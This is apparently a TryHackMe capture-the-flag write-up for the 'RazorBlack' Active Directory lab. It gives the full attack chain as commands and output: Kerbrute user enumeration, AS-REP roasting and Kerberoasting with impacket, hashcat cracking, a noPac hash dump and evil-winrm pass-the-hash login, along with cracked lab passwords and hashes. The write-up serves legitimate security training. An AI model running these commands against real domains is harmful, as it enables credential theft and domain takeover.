RazorBlack is a TryHackMe Active Directory challenge.

Enumeration:

nmap -sV -oN razorblack_ports 10.10.6.150

initial nmap scan

All ports using the -p- option

It appears that NFS is available, so we’ll explore it.

NFS:

Mounting the /users directory.

sbradley flag: THM{ab53e0}

Active Directory:

Contents of the xlsx document:

Using the discovered names, we’ll create potential usernames so that we can test some Active Directory attacks.

dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradely
clin
daven
imogen
tamara
arthur
carl
nolan
reza
ljudmila
rico
tyson
steven
chamber

Using Kerbrute, we were able to get a ticket and validate usernames.

Note that the ticket did not work, so we had to use impacket-GetNPUsers instead for the hash.

./kerbrute_linux_amd64 userenum –dc 10.10.166.100 -d raz0rblack.thm usernames.txt

2022/03/14 13:34:19 > [+] VALID USERNAME: lvetrova@raz0rblack.thm 2022/03/14 13:34:19 > [+] twilliams has no pre auth required. Dumping hash to crack offline: $krb5asrep$18$twilliams@RAZ0RBLACK.THM:07fbfbff68eb4b386f0c5eceacc965df$caaaff607c259887fdf470cf1654e6a50d3e251c7b3b1e94dea2c864023d80a87580bb785bcbe631bb9e1bcc7098b11f10e600bb5b96fa3f1c3c898a655571f75868f4d81da8e788da3a445dde043f9c0ca75f3f0239f8c2b904a4f4bd4631ae5538c1acf804c6ff83fa02c9c6e99a395fe0c4a786605e0835d15662a385cd908ecd6a0f7a3e892a89d15f7a5ee1806f94c7b32f81e5751afd8a15a3a74ea3e6388148d9e5b708a4ba086403278d4f3f2000dbeba81a6be0b091a371e02ff0bf0862414cb84c7487b523ccae1fb0415b5ab6b3f40ee835100f9a9d84580310feeb0a920800fe69d53210e9adc2ac5f15082146bfacd275ea08d9d1531b7753ca7f760bd4 2022/03/14 13:34:19 > [+] VALID USERNAME: twilliams@raz0rblack.thm

Valid usernames:
lvetrova
twilliams

impacket-GetNPUsers raz0rblack.thm/ -no-pass -usersfile usernames.txt

Cracking the hash using hashcat hashcat -m 18200 asprephash.txt rockyou.txt

twilliams:roastpotatoes

Getting SPN hashes.

impacket-GetUserSPNs raz0rblack.thm/twilliams:roastpotatoes -dc-ip 10.10.166.100 -request

Cracking the hash for xyan’s account.

hashcat -m 13100 xyanhash /usr/share/wordlists/rockyou.txt

xyan1d3:cyanide9amine5628

Using noPac to dump hashes.
https://github.com/Ridter/noPac

python3 ~/Scripts/noPac/noPac.py raz0rblack.thm/xyan1d3:‘cyanide9amine5628’ -dc-ip 10.10.166.100 -dc-host haven-dc -dump –impersonate administrator -use-ldap

Using evil-winrm with the Admnistrator’s hash to gain access to the system.

evil-winrm -i 10.10.166.100 -u administrator -H ‘9689931bed40ca5a2ce1218210177f0c’